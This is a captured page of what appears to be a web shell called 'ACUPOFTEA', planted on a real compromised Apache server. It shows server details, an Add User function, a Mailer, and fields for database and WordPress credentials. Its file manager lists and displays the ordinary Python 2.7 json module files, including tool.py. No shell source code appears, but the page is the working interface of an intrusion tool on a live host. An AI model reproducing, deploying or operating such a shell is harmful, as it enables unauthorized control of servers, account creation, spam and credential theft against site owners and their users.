System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
json
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
tool.py
r"""Command-line tool to validate and pretty-print JSON Usage:: $ echo '{"json":"obj"}' | python -m json.tool { "json": "obj" } $ echo '{ 1.2:3.4}' | python -m json.tool Expecting property name enclosed in double quotes: line 1 column 3 (char 2) """ import sys import json def main(): if len(sys.argv) == 1: infile = sys.stdin outfile = sys.stdout elif len(sys.argv) == 2: infile = open(sys.argv[1], 'rb') outfile = sys.stdout elif len(sys.argv) == 3: infile = open(sys.argv[1], 'rb') outfile = open(sys.argv[2], 'wb') else: raise SystemExit(sys.argv[0] + " [infile [outfile]]") with infile: try: obj = json.load(infile) except ValueError, e: raise SystemExit(e) with outfile: json.dump(obj, outfile, sort_keys=True, indent=4, separators=(',', ': ')) outfile.write('\n') if __name__ == '__main__': main()
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
__init__.py
text/x-script.python
14.38 KB
-rw-r--r--
2024-04-10 04:58:35
__init__.pyc
application/x-bytecode.python
13.6 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/x-bytecode.python
13.6 KB
-rw-r--r--
2024-04-10 04:58:46
decoder.py
text/plain
13.38 KB
-rw-r--r--
2024-04-10 04:58:35
decoder.pyc
application/x-bytecode.python
11.68 KB
-rw-r--r--
2024-04-10 04:58:46
decoder.pyo
application/x-bytecode.python
11.68 KB
-rw-r--r--
2024-04-10 04:58:46
encoder.py
text/plain
16.01 KB
-rw-r--r--
2024-04-10 04:58:35
encoder.pyc
application/x-bytecode.python
13.4 KB
-rw-r--r--
2024-04-10 04:58:46
encoder.pyo
application/x-bytecode.python
13.4 KB
-rw-r--r--
2024-04-10 04:58:46
scanner.py
text/plain
2.24 KB
-rw-r--r--
2024-04-10 04:58:35
scanner.pyc
application/x-bytecode.python
2.18 KB
-rw-r--r--
2024-04-10 04:58:46
scanner.pyo
application/x-bytecode.python
2.18 KB
-rw-r--r--
2024-04-10 04:58:46
tool.py
text/plain
997 B
-rw-r--r--
2024-04-10 04:58:35
tool.pyc
application/x-bytecode.python
1.26 KB
-rw-r--r--
2024-04-10 04:58:46
tool.pyo
application/x-bytecode.python
1.26 KB
-rw-r--r--
2024-04-10 04:58:46
~ ACUPOFTEA - accounting.gulfstore-gcc.com